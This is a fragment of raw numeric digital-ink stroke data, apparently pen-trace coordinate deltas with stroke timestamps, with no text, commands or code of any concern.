3 0,-26-4 0,6 5 0,4 0 0,-9 0 0,11 0 0,-7 0 0,0 0 0,-7 0 0,-1 0 0,-7 0 0,0 0 0,0 0 0,15 0 0,-5 0 0,20 0 0,-6 0 0,15 0 0,3 0 0,0 0 0,5 0 0,-5 0 0,-36 0 0,0 0 0,46 0 0,-45 3 0,-2 0 0,23-2 0,-20 5 0,-3-1 0,-1-3 0,47 4 0,-39-6 0,12 0 0,-2 0 0,-14 0 0,-1 0 0,0 0 0,-5 0 0,18 0 0,-2 0 0,13 0 0,1 0 0,7 0 0,-19 0 0,-13-3 0,1 0 0,25 1 0,-23-4 0,0 1 0,12 3 0,-9 0 0,0-1 0,8-2 0,-18 4 0,2 1 0,47-5 0,-28 5 0,18 0 0,-21-5 0,-6 4 0,27-9 0,-8 8 0,8-4 0,-14 1 0,5 4 0,8-9 0,9 8 0,-44-3 0,0-1 0,0 5 0,2 1 0,28-3 0,3 0 0,-17 3 0,1 0 0,20 0 0,0 0 0,-19-3 0,-4 0 0,3 2 0,-1 0 0,6-2 0,0 0 0,-4 3 0,-1 0 0,6-3 0,-2 0 0,-8 2 0,-2 0 0,-1-2 0,0 0 0,-4 3 0,0 0 0,-1-3 0,1 0 0,-5 3 0,0-1 0,-1-2 0,0 0 0,0 0 0,-1 1 0,47 0 0,-47-1 0,1 0 0,0 3 0,0 0 0,44 0 0,-44-2 0,0-1 0,42 2 0,-6-5 0,-18 6 0,-14 0 0,-1 0 0,17 0 0,-23 0 0,2 0 0,40 0 0,-37 0 0,37 0 0,-11 0 0,-18 0 0,20 0 0,-32 0 0,-1 0 0,17 0 0,-3 0 0,-1 0 0,-11 0 0,-3 0 0,2 0 0,18 0 0,7 0 0,14 0 0,-41 0 0,35-4 0,-22 3 0,17-4 0,-18 5 0,21 0 0,-16 0 0,14 0 0,-2 0 0,-21 0 0,27 0 0,-35 0 0,4 0 0,2 0 0,13 0 0,19 0 0,-11 0 0,-6 0 0,9 0 0,-2 5 0,2-4 0,-21 8 0,16-8 0,-23 3 0,43-4 0,-11 0 0,7 0 0,-13 0 0,-21 0 0,4 4 0,-11-3 0,4 4 0,0-5 0,-4 4 0,10-3 0,-3 3 0,-1-4 0,6 0 0,-13 5 0,6-4 0,-7 3 0,1-4 0,-1 0 0,0 4 0,-6-3 0,5 3 0,-11 0 0,11-3 0,-5 3 0,0-4 0,5 4 0,-11-3 0,11 3 0,-10-4 0,4 0 0,0 4 0,-5-3 0,11 4 0,-11-5 0,11 0 0,-10 0 0,9 0 0,-9 0 0,9 0 0,-9 0 0,9 0 0,-9 0 0,4 0 0,-6 3 0,6-2 0,-5 3 0,5-4 0,-1 0 0,-3 0 0,3 4 0,1-3 0,-5 3 0,5-4 0,-6 0 0,6 0 0,-4 0 0,4 0 0,-6 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-5 0 0,-5 0 0,4 0 0,-6 0 0,8 0 0,-5 0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50:13.52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0 137 16383,'56'0'0,"-14"0"0,-4 0 0,-6 0 0,9 0 0,5 0 0,-5 0 0,0 0 0,4 0 0,-9 0 0,4 0 0,-6 0 0,0 0 0,6 0 0,-4 0 0,3 0 0,-5 0 0,0 0 0,6 0 0,-5 0 0,18 0 0,-10 0 0,10 0 0,-6 0 0,-6 0 0,4 0 0,-9 0 0,9 0 0,-9 0 0,4 0 0,0 0 0,-5 0 0,5 0 0,0 0 0,-4 0 0,3 0 0,-4 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-5 0 0,4 0 0,-9 0 0,4 0 0,-5 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,5 0 0,1 0 0,1 0 0,2 0 0,8 0 0,-9 0 0,7 0 0,-10 0 0,1 0 0,5 0 0,6 0 0,-4 0 0,9 0 0,-4 0 0,6 0 0,1 0 0,-7 0 0,-1 0 0,-12 0 0,0 0 0,-9 0 0,-1 0 0,-5-3 0,5 2 0,1-2 0,4 3 0,0-3 0,4 2 0,-3-3 0,9 1 0,-3 2 0,10-7 0,-5 7 0,5-7 0,-1 7 0,-3-7 0,25 3 0,-17-4 0,12 4 0,-17 1 0,-5 4 0,0-4 0,0 3 0,0-3 0,0 1 0,0 2 0,1-7 0,-1 7 0,0-6 0,-9 6 0,2-7 0,-9 8 0,5-7 0,-4 6 0,-2-2 0,-3 3 0,5-3 0,-4-1 0,2 0 0,0 1 0,-7 1 0,9 1 0,-1-1 0,-5 2 0,7 0 0,-7 0 0,5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50:10.68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0 137 16383,'72'0'0,"-16"0"0,-17 0 0,-10 0 0,5 0 0,-5 0 0,-1 0 0,12 0 0,-17 0 0,16 0 0,-20 0 0,0 0 0,13 0 0,-11 0 0,18 0 0,-10 0 0,0 0 0,20 0 0,-10 0 0,19 0 0,3 0 0,-17 0 0,16 0 0,-5 0 0,-10 0 0,14 0 0,-23 0 0,4 0 0,-11 0 0,-5 0 0,3 0 0,-7 0 0,18 0 0,-7 0 0,9 0 0,0 0 0,8 0 0,0 0 0,13 0 0,-6 0 0,0 0 0,-1 0 0,-7 0 0,-6 0 0,-6 0 0,-7 0 0,5 0 0,-7-7 0,8 5 0,-12-4 0,1 6 0,-4 0 0,-1 0 0,5 0 0,-3 0 0,7 0 0,1 0 0,2 0 0,4 0 0,0 0 0,5 0 0,-3 0 0,9-5 0,-10 4 0,0-3 0,-2 4 0,2 0 0,-4 0 0,7 0 0,-13 0 0,2 0 0,7 0 0,-12 0 0,10 0 0,-13 0 0,0 0 0,13-4 0,-14 3 0,14-3 0,-8 4 0,0-4 0,9 4 0,-4-4 0,4 0 0,1 3 0,-5-2 0,10-1 0,-18 3 0,17-4 0,-18 5 0,13-3 0,-9 2 0,4-3 0,-5 4 0,10-4 0,8 3 0,-3-7 0,0 7 0,-5-6 0,-3 6 0,9-7 0,-4 3 0,5 0 0,-5-2 0,5 2 0,0 0 0,-10-2 0,9 6 0,-15-2 0,4 3 0,-9 0 0,-2 0 0,3 0 0,-5 0 0,5 0 0,-6 0 0,-1 0 0,7 0 0,-6 0 0,5 0 0,-5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22:38.23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68 16383,'78'0'0,"-5"0"0,-26 0 0,-6 0 0,5 0 0,-15 0 0,7 0 0,-14 0 0,4 0 0,-5 0 0,5 0 0,-4 0 0,15 0 0,13 0 0,4 0 0,9 0 0,-4 0 0,-3 0 0,-17 0 0,5 0 0,-11 0 0,5 0 0,-11 0 0,4 0 0,-9 0 0,4 0 0,-5 3 0,5-2 0,-4 2 0,4-3 0,0 4 0,1-3 0,5 3 0,0-4 0,6 4 0,1-3 0,7 3 0,-1-4 0,0 4 0,0-3 0,0 3 0,0-4 0,0 0 0,0 5 0,-6-4 0,5 3 0,-10-4 0,9 0 0,-9 4 0,10-3 0,-5 7 0,6-7 0,14 3 0,-4 1 0,12-4 0,1 3 0,-19-4 0,23 0 0,-29 0 0,22 0 0,-18 0 0,4 0 0,-12 0 0,-1 0 0,-6 0 0,0 0 0,0 0 0,6 0 0,-4 0 0,9 0 0,-4 0 0,6 0 0,0 0 0,0 0 0,0 0 0,-5 0 0,-2 0 0,-1 0 0,-3 0 0,4 0 0,-11 0 0,4 0 0,-9 0 0,0 0 0,-2 0 0,-11 0 0,16 0 0,-15 0 0,21 0 0,-2 0 0,5 0 0,23 0 0,-20 4 0,28-3 0,-18 3 0,13-4 0,-7 0 0,-1 0 0,-7 0 0,-6 0 0,5 0 0,-11 0 0,5 0 0,0 0 0,-4 0 0,9 0 0,-9 0 0,9 0 0,-10 0 0,5 0 0,-11 0 0,-1 0 0,-5 0 0,5 0 0,-4 0 0,9 0 0,-4 0 0,5 0 0,0 0 0,1 0 0,-1 0 0,6 0 0,-5 0 0,5-4 0,-1 3 0,3-3 0,4 0 0,16-2 0,-12 1 0,11-5 0,-13 9 0,5-7 0,3 6 0,5-2 0,-5 0 0,-3 3 0,-5-4 0,-1 1 0,0 3 0,0-3 0,0 0 0,0 3 0,0-8 0,-6 8 0,5-3 0,-4 4 0,5-4 0,-6 3 0,4-3 0,-3 0 0,5 3 0,7-8 0,-5 8 0,-2-8 0,-1 8 0,-11-6 0,5 6 0,-6-3 0,0 0 0,-5 4 0,4-4 0,-4 4 0,0-4 0,-1 4 0,-5-4 0,0 4 0,-4 0 0,-2 0 0,-3 0 0,4 0 0,-3 0 0,8 0 0,-4 0 0,4 0 0,5 0 0,1 0 0,10 0 0,-3 0 0,9 0 0,-10 0 0,11 0 0,-15 0 0,7 0 0,-9 0 0,1 4 0,-2-4 0,-6 4 0,1-4 0,0 0 0,5 4 0,-4-3 0,4 2 0,0-3 0,-4 4 0,4-3 0,-9 2 0,-2-3 0,-1 0 0,-2 0 0,3 0 0,-2 3 0,1-3 0,5 3 0,-9-3 0,8 0 0,-8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15:50.27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16383,'56'0'0,"1"0"0,-32 0 0,15 0 0,-10 0 0,9 0 0,-15 0 0,9 0 0,-4 0 0,0 0 0,10 0 0,-3 0 0,6 0 0,-3 0 0,1 0 0,1 0 0,13 0 0,-6 0 0,6 0 0,-8 0 0,8 0 0,-5 0 0,4 0 0,-5 0 0,-7 0 0,-6 0 0,-7 0 0,-5 0 0,-8 0 0,2 0 0,-3 0 0,4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15:48.51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3661 6 16383,'-54'-1'0,"0"-1"0,-29 0 0,38 2 0,14 0 0,11 0 0,-70 0 0,46 0 0,-42 0 0,53 0 0,-2 0 0,9 0 0,-7 0 0,-27 0 0,22 0 0,-28 0 0,33 0 0,9 0 0,-4 0 0,-27 0 0,13 0 0,-20 0 0,16 0 0,10 0 0,-16 5 0,3 0 0,-1 1 0,-1 3 0,15-8 0,-3 3 0,14-1 0,-2-2 0,-2 2 0,3 0 0,-3-2 0,7 2 0,7-3 0,-3 0 0,-4 0 0,2 4 0,-8-4 0,9 4 0,2-1 0,-1-2 0,-17 2 0,3-3 0,-9 0 0,13 0 0,6 3 0,3-2 0,1 2 0,5-3 0,-4 0 0,-6 0 0,5 0 0,-5 0 0,9 0 0,-14 0 0,7 0 0,-18 0 0,15 0 0,-4 0 0,9 0 0,2 0 0,3 0 0,-1 0 0,-4 0 0,-1 0 0,0 0 0,3 0 0,-12 0 0,8 0 0,-18 0 0,10 0 0,0 0 0,-10 0 0,9 0 0,-1 0 0,4 0 0,8 0 0,1 0 0,0 0 0,5 0 0,-2 0 0,0 0 0,-1 0 0,-1 0 0,-8 0 0,4 0 0,-9 0 0,11 0 0,-2 0 0,6 0 0,-12 0 0,12 3 0,-12-2 0,12 2 0,-2-3 0,-7 0 0,4 0 0,-9 0 0,10 0 0,1 0 0,5 0 0,-16 0 0,12 0 0,-11 0 0,14 0 0,1 0 0,-11 0 0,8 0 0,-8 0 0,11 0 0,-1 0 0,-5 0 0,-1 0 0,0 0 0,5 0 0,-7 0 0,9 0 0,-10 0 0,7 0 0,1 0 0,-6 0 0,6 0 0,-2 0 0,0 0 0,6 0 0,-11 0 0,9 0 0,-4 0 0,3 0 0,-2 0 0,-1 0 0,-1 0 0,3 0 0,-2 0 0,2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15:45.66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3192 1 16383,'-65'0'0,"16"0"0,17 0 0,12 0 0,-8 0 0,10 0 0,-22 0 0,25 0 0,-28 0 0,26 0 0,-7 0 0,10 0 0,-14 0 0,-1 0 0,-7 0 0,-3 0 0,10 0 0,0 0 0,1 0 0,-28 0 0,26 0 0,-26 0 0,28 4 0,8-4 0,-7 8 0,13-8 0,-19 8 0,7-3 0,-9 0 0,7 2 0,5-6 0,4 5 0,2-5 0,3 2 0,-15 1 0,8 0 0,-13 1 0,15-2 0,2 0 0,3-2 0,-27 5 0,16-2 0,-21 0 0,18 0 0,8-1 0,-7-3 0,-2 3 0,-8 1 0,1-2 0,-3 2 0,15-1 0,-3-2 0,4 2 0,-18 2 0,18-4 0,-21 4 0,24-5 0,-4 3 0,-8-3 0,5 7 0,-13-6 0,11 6 0,1-6 0,-27 8 0,19-8 0,-20 8 0,23-8 0,4 6 0,-5-6 0,-13 3 0,15-1 0,-13-2 0,20 2 0,-3 1 0,10-3 0,0 2 0,-5-3 0,8 0 0,-12 0 0,12 0 0,-2 0 0,-11 4 0,6-3 0,-16 3 0,14-4 0,-4 0 0,5 0 0,-5 4 0,4-3 0,0 3 0,2-4 0,11 0 0,-8 0 0,-1 0 0,1 0 0,-8 0 0,13 0 0,-8 0 0,-14 0 0,8 0 0,-17 0 0,21 0 0,-4 0 0,0 0 0,8 0 0,-6 0 0,11 0 0,-3 0 0,3 0 0,2 0 0,-7 0 0,7-3 0,-6 2 0,3-2 0,3 3 0,-2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01:04.97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16383,'69'0'0,"-2"0"0,-25 0 0,11 0 0,3 0 0,21 0 0,-3 0 0,-19 0 0,3 0 0,-7 0 0,0 0 0,12 0 0,1 0 0,-5 0 0,-1 0 0,5 0 0,1 0 0,6 2 0,0 3 0,6 1 0,1 2 0,-2-1 0,1 2 0,-1 7 0,-1 1 0,0-5 0,0 0 0,-4 5 0,2 0 0,11-1 0,5-1 0,-17-2 0,4 2 0,-4-2 0,13 0 0,1 0 0,-9 0 0,4 1 0,-5-1 0,5-1 0,-3-1 0,12 2 0,-1-2 0,-20 0 0,1-1 0,21 1 0,-3 1 0,-31-2 0,-1 0 0,21 2 0,0-1 0,-22-2 0,-3 0 0,46 3 0,-9 0 0,-1-1 0,-23 0 0,4 0 0,-13-2 0,7-3 0,-6 3 0,-9-8 0,-12 3 0,-2 0 0,-4-3 0,5 3 0,0-4 0,0 0 0,6 0 0,2 0 0,-1 0 0,5 0 0,-5 0 0,1 0 0,3 0 0,-9 0 0,9 0 0,-4 0 0,1 0 0,-3 0 0,-9 0 0,-3-4 0,-4 4 0,0-4 0,-4 4 0,-1 0 0,-2 0 0,1 0 0,-1 0 0,-1 0 0,0 0 0,-2-7 0,-1-5 0,-6-5 0,-4 0 0,-2 1 0,-5 4 0,-11-3 0,4 6 0,-9 2 0,8-1 0,-5 3 0,-3-8 0,-9-5 0,-5-5 0,-8-5 0,1 5 0,-24-12 0,30 15 0,-50-24 0,49 28 0,-37-20 0,25 24 0,-7-11 0,-4 12 0,12-3 0,-6 4 0,7 5 0,-22-5 0,10 9 0,-18-4 0,16 5 0,-9 0 0,1 0 0,-10 0 0,2 0 0,12 0 0,-2 0 0,4 0 0,6 0 0,2 0 0,15 4 0,15-4 0,2 4 0,10-4 0,-1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16:47.189"/>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3735 0 16383,'-85'0'0,"16"0"0,30 0 0,9 0 0,-10 0 0,10 3 0,7 1 0,-2 4 0,-4 4 0,1-3 0,-6 4 0,12-6 0,-1 1 0,-18 5 0,-3 7 0,-1-4 0,0 2 0,16-10 0,0 0 0,5 0 0,1 2 0,0-3 0,-16 4 0,9-5 0,-6 2 0,8 0 0,-21 12 0,10-9 0,-20 13 0,17-14 0,1 7 0,-19-1 0,26-2 0,-24 1 0,32-7 0,-7-3 0,10-2 0,-11 1 0,3 1 0,-9 0 0,6-1 0,5 0 0,-10-4 0,3 8 0,-5-7 0,1 3 0,11-4 0,-24 5 0,24-4 0,-29 4 0,27-1 0,-9-3 0,-31 9 0,28-9 0,-28 5 0,31-2 0,-42-3 0,25 8 0,-38-8 0,15 3 0,-10-4 0,37 0 0,-1 0 0,-2 0 0,0 0 0,2 0 0,0 0 0,-4 0 0,-1 0 0,-4 0 0,0 0 0,3 0 0,0 0 0,-3 0 0,2 0 0,-25 0 0,14 0 0,5 0 0,25 0 0,-42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16:45.197"/>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0 16383,'97'0'0,"-4"0"0,-6 0 0,11 0 0,1 0 0,-45 0 0,-3 0 0,18 0 0,4 0 0,11 0 0,-31 0 0,6 0 0,-1 0 0,-14 0 0,41 0 0,-23 0 0,2 0 0,-2 0 0,5 0 0,-9 0 0,18 0 0,-12 0 0,6 0 0,-8 0 0,15 0 0,-11 0 0,19 5 0,-21-4 0,-8 8 0,3-8 0,-16 3 0,10 0 0,-5-3 0,-8 3 0,6 0 0,-10-3 0,4 7 0,0-7 0,1 7 0,0-7 0,5 8 0,-5-4 0,6 0 0,-6 3 0,5-7 0,-10 7 0,-2-8 0,-1 8 0,-9-7 0,6 3 0,-2-4 0,-5 0 0,5 0 0,-5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16:43.041"/>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1 623 16383,'75'0'0,"4"0"0,-46 0 0,18 0 0,-8 0 0,5 0 0,6 0 0,-8 0 0,-4 0 0,-2 0 0,-6 0 0,0 0 0,0 0 0,-5 0 0,4 0 0,-4 0 0,5 0 0,0 0 0,1 0 0,-2 0 0,2 0 0,4 0 0,-4 0 0,10 0 0,-9 0 0,4 0 0,0 0 0,-5 0 0,11 0 0,-11 0 0,5 0 0,-6 0 0,0 0 0,-5 0 0,4 0 0,-4 0 0,0 0 0,4 0 0,-9 0 0,9 0 0,-4 0 0,5 3 0,0-2 0,0 3 0,0-4 0,0 0 0,6 0 0,1 0 0,0 0 0,5 0 0,-5 0 0,0 0 0,-1 0 0,-6 0 0,0 0 0,0 0 0,-5 0 0,4 0 0,-9 0 0,9 0 0,-4 0 0,5 0 0,6 0 0,-4 0 0,10 0 0,-5 0 0,6 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,-6 0 0,-1 0 0,-6 0 0,0 0 0,1 0 0,-6 0 0,3 0 0,-2 0 0,4 0 0,5 0 0,-3 0 0,9 0 0,-3 0 0,-1 0 0,5 0 0,-5 0 0,1 0 0,3 0 0,-9 0 0,4 0 0,-6 0 0,0 0 0,-5 0 0,4 0 0,-9 0 0,9 0 0,-4 0 0,0 3 0,4-2 0,-4 3 0,0-1 0,3-2 0,-2 2 0,4 1 0,0-3 0,-5 3 0,4-4 0,-9 0 0,9 0 0,-9 0 0,9 0 0,-4 4 0,5-3 0,1 2 0,-6-3 0,4 0 0,-4 4 0,0-3 0,4 3 0,-4-4 0,0 0 0,4 0 0,-4 0 0,11 0 0,-5 0 0,11 0 0,-5 0 0,6 0 0,0 4 0,1-3 0,-1 3 0,-6-4 0,5 0 0,-11 0 0,11 0 0,-11 4 0,11-3 0,-5 3 0,1-4 0,3 0 0,-3 0 0,5 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,22 0 0,-16 0 0,23 0 0,-14 0 0,10 0 0,-14 0 0,15 0 0,-22 0 0,17 0 0,-6 0 0,-1 0 0,1 0 0,-6 0 0,4 0 0,-11 0 0,4 0 0,0 0 0,-5 0 0,6 0 0,-1 0 0,-4 0 0,11 0 0,-11 0 0,5 0 0,-7 0 0,7 0 0,-6 0 0,6 0 0,15-5 0,-9 3 0,5-3 0,-7 5 0,-8 0 0,12 0 0,0 0 0,-7-4 0,5 3 0,-11-4 0,-1 2 0,-2 2 0,-5-3 0,20-1 0,-3 4 0,11-4 0,-19 1 0,24 3 0,-33-3 0,58 4 0,-56 0 0,40 0 0,-33-4 0,12 2 0,0-2 0,15-2 0,-4 5 0,-6-4 0,6 0 0,-22 3 0,18-7 0,-14 8 0,6-4 0,-6 1 0,14 2 0,-18-2 0,15-1 0,-9 4 0,14-3 0,8 4 0,7 0 0,3 0 0,7 0 0,1 0 0,-1 0 0,1 0 0,0-6 0,-8 5 0,6-10 0,-15 0 0,6-2 0,-8-3 0,8-1 0,-6-1 0,15 0 0,-6-4 0,-20 10 0,-14 0 0,-2 0 0,-1 1 0,6-1 0,3-1 0,8-4 0,26-7 0,-8 0 0,2 6 0,-37 6 0,2 1 0,4 3 0,2 1 0,-2-5 0,2 0 0,8 1 0,1 0 0,-5 1 0,0 0 0,5 0 0,1 0 0,0-1 0,-1 2 0,-4 1 0,-2 1 0,-11-3 0,-2 1 0,2 3 0,-3 0 0,24-5 0,13 0 0,-15 0 0,-8 1 0,-16 0 0,-12 2 0,-7 0 0,-5 3 0,2-4 0,-1 4 0,2-4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16:37.163"/>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1 16383,'53'0'0,"1"0"0,-3 0 0,-1 0 0,3 0 0,-1 0 0,-1 0 0,1 0 0,15 0 0,3 0 0,-6 0 0,1 0 0,-1 0 0,1 0 0,-2 0 0,0 0 0,-4 0 0,-1 0 0,0 0 0,0 0 0,6 0 0,-1 0 0,-11 0 0,-1 0 0,10 0 0,0 0 0,39 0 0,-46 0 0,0 0 0,-1 0 0,-1 0 0,45 0 0,-9 0 0,-15 0 0,-22 0 0,-1 0 0,22 0 0,19 0 0,-18 0 0,-16 0 0,11 0 0,-6 0 0,-7 0 0,5 5 0,-11-4 0,4 3 0,-11-4 0,3 0 0,-9 0 0,4 0 0,-6 4 0,0-3 0,0 3 0,6-4 0,-4 0 0,9 0 0,10 0 0,-5 0 0,25 0 0,-10 0 0,13 0 0,9 0 0,-21 0 0,17 0 0,-26 0 0,20 0 0,11 0 0,-5 0 0,5 0 0,-11 0 0,-6 0 0,16 0 0,-6 0 0,-9 0 0,3 5 0,-10-4 0,6 4 0,-2 0 0,-7-4 0,-7 3 0,21-4 0,-17 5 0,26-4 0,-28 4 0,11-1 0,-14-3 0,8 4 0,-8-5 0,-7 0 0,-7 0 0,-11 0 0,-5 0 0,2 3 0,-2-3 0,3 3 0,11-3 0,-18 0 0,12 0 0,-8 0 0,11 0 0,-4 0 0,13 0 0,-7 0 0,4 0 0,19 0 0,-26 0 0,18 0 0,-17 0 0,13 0 0,-14 0 0,10 0 0,-24 0 0,19 0 0,-13 0 0,12 0 0,-3 0 0,12 0 0,8 0 0,6 0 0,-6 0 0,21 0 0,-10 0 0,7 0 0,2 0 0,-18 0 0,12 0 0,-13 0 0,-3 0 0,-11 0 0,-7 0 0,-2 0 0,-4 0 0,0 0 0,16 0 0,-7 0 0,5 0 0,8 0 0,-13 0 0,16 0 0,-7 0 0,0 0 0,7 0 0,-16 0 0,2 0 0,-17 0 0,11 0 0,-9 0 0,14 0 0,-10 0 0,0 0 0,-1 0 0,12 0 0,-17 0 0,21 0 0,-7 0 0,6 0 0,11 0 0,0 0 0,8 0 0,9 0 0,-13 0 0,8 0 0,-16 0 0,12 0 0,-7 0 0,-7 0 0,12 0 0,-26 0 0,24 0 0,-15 0 0,0 0 0,23 0 0,-27 0 0,43 0 0,-42 0 0,35 0 0,-26 0 0,13 0 0,0 0 0,-7 0 0,5 0 0,-11 0 0,4 0 0,-6 0 0,0 0 0,0 0 0,-5 0 0,3 0 0,-9 0 0,-1 0 0,-7 0 0,12 0 0,-17 0 0,21 0 0,-24 0 0,13 0 0,-9 0 0,4 0 0,11 0 0,-17 0 0,15 0 0,-18 0 0,14-4 0,-11 3 0,15-4 0,-6 5 0,4 0 0,18 0 0,-16 0 0,9 0 0,17 0 0,-27 0 0,52 0 0,-39 0 0,16-3 0,9 2 0,-13-3 0,6 4 0,-8 0 0,5 0 0,-22 0 0,18 0 0,-11 0 0,-15 0 0,19 0 0,-24 0 0,0 0 0,-1 0 0,0 0 0,2 0 0,-5 0 0,5 0 0,-10 0 0,6 0 0,-1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16:32.960"/>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1 217 16383,'77'0'0,"-5"0"0,-31 0 0,11 0 0,-9 0 0,17 0 0,-11 0 0,5 0 0,-13 0 0,-1 0 0,-6 0 0,0 0 0,6 0 0,-5 0 0,5 0 0,-6 0 0,0 0 0,0 0 0,0 4 0,-5-3 0,35 10 0,-32-9 0,26 5 0,-35-7 0,5 4 0,-4-3 0,9 6 0,2-6 0,1 7 0,3-7 0,-9 6 0,3-6 0,-4 6 0,5-6 0,-5 6 0,4-6 0,-9 6 0,9-6 0,-4 2 0,0 1 0,4-4 0,2 4 0,1 0 0,4-3 0,-1 7 0,-3-7 0,4 3 0,0 0 0,1-3 0,6 3 0,0-4 0,0 0 0,0 0 0,0 0 0,7 0 0,9 0 0,-6 0 0,11 0 0,-13 0 0,7 0 0,-1 0 0,0 0 0,-6 0 0,5 5 0,-12-4 0,6 4 0,-12-2 0,3-2 0,-9 7 0,9-7 0,-9 6 0,10-6 0,-5 3 0,6 0 0,6-3 0,-5 4 0,6-1 0,-7-3 0,0 3 0,0 0 0,-6-3 0,5 3 0,-5-4 0,7 5 0,13-4 0,-16 3 0,28-4 0,-14 0 0,12 0 0,-8 0 0,22 0 0,-24 0 0,19 0 0,3 0 0,-28 0 0,28 0 0,-3 0 0,-25 0 0,-1 0 0,0 0 0,2 0 0,38 0 0,-23 0 0,-6 0 0,2 0 0,-4 0 0,0 0 0,14 0 0,-21 0 0,12 0 0,-26 0 0,10 0 0,-16 0 0,-1 0 0,-7 0 0,0 0 0,1 0 0,0 0 0,4 0 0,2 0 0,-4 0 0,13 0 0,-14 0 0,5 0 0,9 0 0,-16 0 0,22-4 0,-14-2 0,5 1 0,5 1 0,-4 0 0,5-1 0,0-1 0,0-2 0,0 7 0,0-3 0,1-1 0,-2 4 0,2-7 0,-2 7 0,14-8 0,-16 8 0,23-9 0,-18 4 0,7 1 0,4-5 0,-11 9 0,11-8 0,2 8 0,1-8 0,13 8 0,-12-9 0,13 9 0,-6-3 0,-12 0 0,14 3 0,-22-7 0,19 6 0,-8-7 0,-7 8 0,5-4 0,3 0 0,-12 4 0,40-10 0,-28 10 0,12-5 0,-2 6 0,-14 0 0,37 0 0,-33 0 0,20 0 0,-11 0 0,-4-4 0,25 2 0,-22-2 0,7 4 0,1-5 0,-15 4 0,11-4 0,-10 5 0,30-6 0,-32 4 0,-8-1 0,-2 1 0,-10 2 0,40 0 0,-33 0 0,27-6 0,-24 5 0,22-4 0,-27 0 0,8 4 0,-3-4 0,1 1 0,-5 3 0,27-9 0,-30 4 0,29-4 0,-32 5 0,11-4 0,-7 4 0,0-1 0,-6-1 0,-6 6 0,-8-3 0,1 0 0,1 3 0,5-3 0,1 0 0,19 4 0,-20-4 0,38-1 0,-43 3 0,29-3 0,-15 1 0,-5 3 0,7-4 0,-3 1 0,-14 2 0,29-2 0,-34 0 0,28 4 0,-8-8 0,-5 6 0,19-2 0,-25 4 0,43-6 0,-39 5 0,44-4 0,-46 5 0,25 0 0,-11-5 0,1 4 0,5-4 0,-7 5 0,-1 0 0,1 0 0,-6 0 0,5 0 0,-5 0 0,6 0 0,-6 0 0,27 0 0,-21 0 0,36 0 0,-18 0 0,14 0 0,-1 0 0,-13 0 0,10 0 0,7 0 0,-20 0 0,29 5 0,-24 2 0,13-1 0,7 5 0,-8-5 0,-1 0 0,9 5 0,-6-5 0,12 6 0,-32-6 0,19 4 0,-21-4 0,12 1 0,-2-2 0,-14-1 0,6-3 0,10 3 0,2-4 0,13 0 0,1 0 0,11 0 0,-40 0 0,2 0 0,4 0 0,1 0 0,9 3 0,0 0 0,-7-2 0,-3 0 0,-8 2 0,-1 0 0,2-3 0,-3 0 0,21 5 0,21-3 0,-32 3 0,-3-5 0,-19 0 0,-7 0 0,-8 0 0,-2 0 0,0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22:02.976"/>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1 0 16383,'51'0'0,"13"0"0,-32 0 0,26 0 0,-20 0 0,13 0 0,-20 0 0,3 0 0,-12 0 0,-6 0 0,1 0 0,-7 0 0,0 0 0,7 0 0,-2 0 0,13 0 0,1 0 0,11 0 0,15 0 0,-10 0 0,21 0 0,-17 0 0,21 0 0,5 0 0,1 0 0,-6 0 0,-4 0 0,-19 0 0,0 0 0,0 0 0,-5 0 0,-2 0 0,-6 0 0,-5 0 0,4 0 0,-9 0 0,9 0 0,-9 0 0,9 0 0,2 0 0,-4 0 0,12 0 0,0 0 0,5 0 0,28 0 0,-17 0 0,19 0 0,-29 0 0,10 0 0,-10 0 0,6 0 0,4 0 0,-10 0 0,5 0 0,7 0 0,-16 0 0,14 0 0,-23 0 0,9 0 0,-10 0 0,5 0 0,-6 0 0,-5 0 0,4 0 0,-9 0 0,9 0 0,-9 0 0,9 0 0,-4 0 0,6 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,6 0 0,-4 0 0,4 0 0,-1 4 0,17-3 0,-16 4 0,40-5 0,-44 0 0,39 0 0,-26 0 0,6 0 0,6 0 0,-13 0 0,6 0 0,-7 0 0,-6 0 0,4 0 0,-3 0 0,5 0 0,0 0 0,7 0 0,1 0 0,1 0 0,-3 0 0,-6 0 0,-6 0 0,-1 0 0,-11 0 0,-5 0 0,-2 0 0,-3 0 0,-1 0 0,9 0 0,-7 0 0,8 0 0,0 0 0,-4 0 0,9 0 0,-9 0 0,9 0 0,-9 0 0,3 0 0,14 0 0,-14 0 0,24 0 0,-15 0 0,12 0 0,-1 0 0,0 0 0,-6 0 0,-1 0 0,-6 0 0,-9 0 0,2 0 0,-16 0 0,6 0 0,-7 0 0,3 0 0,5 0 0,-7 0 0,15 0 0,-9 0 0,7 0 0,-3 0 0,9 0 0,-9 0 0,12 0 0,-14 0 0,21 0 0,-17 0 0,21 0 0,-6 0 0,-6 3 0,33-2 0,-36 6 0,29-6 0,-27 6 0,15-2 0,-11 0 0,0 2 0,-2-6 0,-13 3 0,7-1 0,-9-2 0,5 6 0,-4-7 0,-1 4 0,-1-4 0,2 3 0,0-2 0,-1 3 0,-8-4 0,2 0 0,3 0 0,-1 0 0,4 3 0,-5-3 0,1 3 0,3-3 0,2 0 0,0 0 0,13 0 0,-14 0 0,10 0 0,-10 0 0,-4 0 0,4 0 0,0 0 0,-4 0 0,0 0 0,-1 0 0,1 4 0,-2-3 0,4 2 0,-6-3 0,13 0 0,-10 0 0,8 0 0,-10 0 0,6 3 0,-2-2 0,2 3 0,-6-4 0,1 0 0,-2 0 0,4 0 0,-1 0 0,-3 0 0,3 0 0,-3 0 0,4 0 0,-1 0 0,1 0 0,-1 0 0,-3 0 0,3 0 0,-3 0 0,4 0 0,-4 0 0,3 0 0,3 0 0,0 0 0,1 0 0,-5 0 0,-5 0 0,5 0 0,-1 0 0,4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25:07.425"/>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0 9 16383,'50'0'0,"-4"0"0,-6 0 0,2 0 0,-6 0 0,8 0 0,-14 0 0,16 0 0,-16 0 0,15 0 0,-15 0 0,5 0 0,-2 0 0,24 0 0,-25 0 0,34 0 0,-34 0 0,15 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-6-3 0,-1 2 0,-6-3 0,1 4 0,-6 0 0,-1 0 0,-5 0 0,-1 0 0,1 